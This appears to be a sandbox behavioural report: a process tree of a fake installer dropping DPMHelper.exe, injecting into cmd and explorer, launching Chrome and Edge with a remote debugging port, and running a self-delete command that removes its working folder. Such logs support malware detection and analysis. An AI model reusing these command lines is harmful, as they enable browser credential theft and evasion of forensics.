C:\Windows\SysWOW64\cmd.execmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/6c962a106f793249c113dfe4730096aa/" && (for %F in (*.exe) do start "" "%F")"4⤵
- System Location Discovery: System Language Discovery
PID:688 -
C:\Users\Admin\AppData\Local\Temp\6c962a106f793249c113dfe4730096aa\DPMHelper.exe"DPMHelper.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3956 -
C:\Users\Admin\AppData\Roaming\mwa_patchv3\DPMHelper.exeC:\Users\Admin\AppData\Roaming\mwa_patchv3\DPMHelper.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3088 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3188 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe8⤵
- System Location Discovery: System Language Discovery
PID:2100
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/d88411800fe77bcb1fb2f8d962f05525/" && (for %F in (*.exe) do start "" "%F")"4⤵
- System Location Discovery: System Language Discovery
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\d88411800fe77bcb1fb2f8d962f05525\DPMHelper.exe"DPMHelper.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4400 -
C:\Users\Admin\AppData\Roaming\streamMonitorerrv2_x86\DPMHelper.exeC:\Users\Admin\AppData\Roaming\streamMonitorerrv2_x86\DPMHelper.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:688 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe8⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2768 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"9⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3432 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff843d2cc40,0x7ff843d2cc4c,0x7ff843d2cc5810⤵PID:5088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:210⤵PID:4408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1732,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:310⤵PID:4360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2172,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:810⤵PID:2604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3132 /prefetch:110⤵
- Uses browser remote debugging
PID:5080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3276 /prefetch:110⤵
- Uses browser remote debugging
PID:3476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4484,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4528 /prefetch:110⤵
- Uses browser remote debugging
PID:4832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4612,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:810⤵PID:3600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3608,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:810⤵PID:3132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4596,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:810⤵PID:4880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4512,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4996 /prefetch:810⤵PID:648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5004 /prefetch:810⤵PID:2948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:810⤵PID:276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4280 /prefetch:810⤵PID:2088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5208,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5012 /prefetch:810⤵PID:1696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4668,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:210⤵
- Uses browser remote debugging
PID:1028
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"9⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5532 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff843d33cb8,0x7ff843d33cc8,0x7ff843d33cd810⤵PID:5548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:210⤵PID:5748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:310⤵
- Suspicious behavior: EnumeratesProcesses
PID:5756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2580 /prefetch:810⤵PID:5772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:110⤵
- Uses browser remote debugging
PID:5960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:110⤵
- Uses browser remote debugging
PID:5968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:210⤵PID:2260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2384 /prefetch:210⤵PID:5164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4108 /prefetch:210⤵PID:5236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3884 /prefetch:210⤵PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4544 /prefetch:210⤵PID:5368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:110⤵
- Uses browser remote debugging
PID:648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:110⤵
- Uses browser remote debugging
PID:5468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3512 /prefetch:810⤵
- Suspicious behavior: EnumeratesProcesses
PID:3484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:110⤵
- Uses browser remote debugging
PID:3056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1876,14478492151023597012,2879124598089646194,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:110⤵
- Uses browser remote debugging
PID:4688
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit9⤵
- System Location Discovery: System Language Discovery
PID:2940 -
C:\Windows\SysWOW64\timeout.exetimeout /t 1010⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5416
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:3440
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4764
-
C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\Installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1731192677 " AI_EUIMSI=""2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:1064
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:760
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:3320
-
C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\Installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1731192677 " AI_EUIMSI=""2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:3088
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1856
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:5280
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5308 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53b2cfa3-c6dc-4459-a3f0-989b7d44a8a4} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" gpu3⤵PID:1204
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2376 -parentBuildID 20240401114208 -prefsHandle 2360 -prefMapHandle 2356 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf096397-6ba0-45a4-8a9e-c0b5a4490a82} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" socket3⤵
- Checks processor information in registry
PID:6048
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2972 -childID 1 -isForBrowser -prefsHandle 1460 -prefMapHandle 3024 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae277e4c-48a9-45e7-bd73-afbae7f58b77} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab3⤵PID:5768
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3396 -childID 2 -isForBrowser -prefsHandle 3416 -prefMapHandle 3412 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {714733b9-c3ab-4c06-adda-0a34bb7a595c} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab3⤵PID:5632
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4196 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4188 -prefMapHandle 4184 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c22a62d8-e529-4418-b3df-2dcf3cfe647b} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" utility3⤵
- Checks processor information in registry
PID:5884
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5332 -childID 3 -isForBrowser -prefsHandle 5324 -prefMapHandle 5276 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bd6f89e-dbe5-4c19-a396-e284d6039265} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab3⤵PID:3928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 4 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0511404-fdd5-425a-b668-5e0171001ab3} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab3⤵PID:1592
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5744 -childID 5 -isForBrowser -prefsHandle 5664 -prefMapHandle 5668 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49d3de85-8fc8-44b0-8638-bfadee068132} 5308 "\\.\pipe\gecko-crash-server-pipe.5308" tab3⤵PID:4888
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:4876 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff84424cc40,0x7ff84424cc4c,0x7ff84424cc582⤵PID:2416
-
-
